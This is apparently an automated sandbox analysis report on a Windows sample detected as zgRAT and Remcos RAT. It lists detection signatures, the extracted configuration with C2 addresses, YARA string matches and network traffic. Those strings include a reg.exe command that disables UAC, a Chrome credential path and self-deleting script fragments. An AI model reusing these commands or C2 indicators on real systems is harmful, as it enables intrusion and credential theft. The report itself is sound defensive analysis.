Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 882705
MD5: 58a91896eaf6efe03ffe6ebb7b731792
SHA1: e3ec7807b22e91e887dd1bc752c426041607216f
SHA256: dc984e3a8de291d49bab5940b8f8047d2a7d8f0dab4231342c36edcee9cbb92e
Tags: NET, exe, MSIL, x64, zgRAT

Detection

Remcos, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Sigma detected: Remcos
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Machine Learning detection for sample
Allocates memory in foreign processes
Contains functionality to modify clipboard data
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Binary contains a suspicious time stamp
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • file.exe (PID: 3852 cmdline: C:\Users\user\Desktop\file.exe MD5: 58A91896EAF6EFE03FFE6EBB7B731792)
    • aspnet_compiler.exe (PID: 6780 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 6768 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 5828 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: zgRAT
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

{"Host:Port:Password": "127.0.0.1:55433:1185.65.134.166:55433:110.11.0.5:55433:145.128.234.54:55433:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-UQ90W9", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Source: file.exe, Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Author: Joe Security
Source: file.exe, Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Author: ditekSHen, Strings:
  • 0x33851:$s1: file:///
  • 0x337ad:$s2: {11111-22222-10009-11112}
  • 0x337e1:$s3: {11111-22222-50001-00000}
  • 0x2f33d:$s4: get_Module
  • 0x2ba2e:$s5: Reverse
  • 0x2baeb:$s6: BlockCopy
  • 0x2c1ba:$s7: ReadByte
  • 0x33865:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

Source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen, Strings:
  • 0x643b8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6434c:$s1: CoGetObject
  • 0x64360:$s1: CoGetObject
  • 0x6437c:$s1: CoGetObject
  • 0x6e15e:$s1: CoGetObject
  • 0x6430c:$s2: Elevation:Administrator!new:
Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown, Strings:
  • 0x6a470:$a1: Remcos restarted by watchdog!
  • 0x6a9d4:$a3: %02i:%02i:%02i:%03i

Source: 4.2.aspnet_compiler.exe.400000.0.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen, Strings:
  • 0x633b8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6334c:$s1: CoGetObject
  • 0x63360:$s1: CoGetObject
  • 0x6337c:$s1: CoGetObject
  • 0x6d15e:$s1: CoGetObject
  • 0x6330c:$s2: Elevation:Administrator!new:
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown, Strings:
  • 0x69470:$a1: Remcos restarted by watchdog!
  • 0x699d4:$a3: %02i:%02i:%02i:%03i
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
  • 0x634c4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63440:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63440:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63938:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64168:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x63534:$str_b2: Executing file:
  • 0x645b4:$str_b3: GetDirectListeningPort
  • 0x63f58:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x640d8:$str_b7: \update.vbs
  • 0x6355c:$str_b9: Downloaded file:
  • 0x63548:$str_b10: Downloading file:
  • 0x635ec:$str_b12: Failed to upload file:
  • 0x6457c:$str_b13: StartForward
  • 0x6459c:$str_b14: StopForward
  • 0x64030:$str_b15: fso.DeleteFile "
  • 0x63fc4:$str_b16: On Error Resume Next
  • 0x64060:$str_b17: fso.DeleteFolder "
  • 0x635dc:$str_b18: Uploaded file:
  • 0x6359c:$str_b19: Unable to delete:
  • 0x63ff8:$str_b20: while fso.FileExists("
  • 0x63a71:$str_c0: [Firefox StoredLogins not found]

              Stealing of Sensitive Information

              Source: Registry Key setAuthor: Joe Security: Data: Details: B8 44 BD 83 D8 99 C8 1A 1F B1 2D B6 25 A1 5D 8A 03 5A B2 9B E4 8C 13 84 AA 33 63 EB 80 AF 7A 48 CB F5 21 D2 59 12 53 78 41 FD 3C 3E FC E0 99 D2 EF C8 AE 2A AB A8 F5 EF FE 5B F1 7F 36 AD 4B 29 AC 6A 0B 2C 7E 19 B1 0F E4 48 4F A9 3D 87 DA 03 93 BB 9F DA ED 8E A0 DD CC E5 F1 B7 02 19 23 C1 63 53 44 B9 17 19 14 64 43 E6 AD BC 04 35 F1 20 6B 9F 4E B8 0E 8E 0E 69 39 51 E0 75 1C BD 62 DC C2 F7 D3 DD , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 5796, TargetObject: HKEY_CURRENT_USER\Software\Rmc-UQ90W9\exepath
              No Snort rule has matched


              AV Detection

              Source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "127.0.0.1:55433:1185.65.134.166:55433:110.11.0.5:55433:145.128.234.54:55433:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-UQ90W9", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
              Source: file.exeReversingLabs: Detection: 35%
              Source: file.exeVirustotal: Detection: 46%
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00432142 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00432142
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR

              Privilege Escalation

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406B71 _wcslen,CoGetObject,4_2_00406B71
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: CEMENT.pdb source: file.exe, 00000000.00000002.567234773.00000177EB320000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.564438533.000001778003B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NBNNhH873.pdb source: file.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0044D0F9 FindFirstFileExA,4_2_0044D0F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B2B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00418650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040B8C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408909
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041AC0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408D1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_00407E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406EB0 FindFirstFileW,FindNextFileW,4_2_00406EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_0040730B

              Networking

              Source: Malware configuration extractorURLs: 127.0.0.1
              Source: Joe Sandbox ViewASN Name: ESAB-ASSE ESAB-ASSE
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficTCP traffic: 192.168.2.4:49693 -> 185.65.134.166:55433
              Source: global trafficTCP traffic: 192.168.2.4:49698 -> 45.128.234.54:55433
              Source: unknownTCP traffic detected without corresponding DNS query: 185.65.134.166
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/j
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F10000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp1
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2C9DCABD6423689A465F00D4F
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpESS
              Source: aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gples8
              Source: aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gprol
              Source: unknownDNS traffic detected: queries for: geoplugin.net
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004255BC recv,4_2_004255BC

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00415802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004099E3 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,4_2_004099E3

              E-Banking Fraud

              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR

              System Summary

              Source: file.exe, type: SAMPLEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.0.file.exe.177e97b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0.2.file.exe.177e97b0000.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.0.file.exe.177e97b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0.2.file.exe.177e97b0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
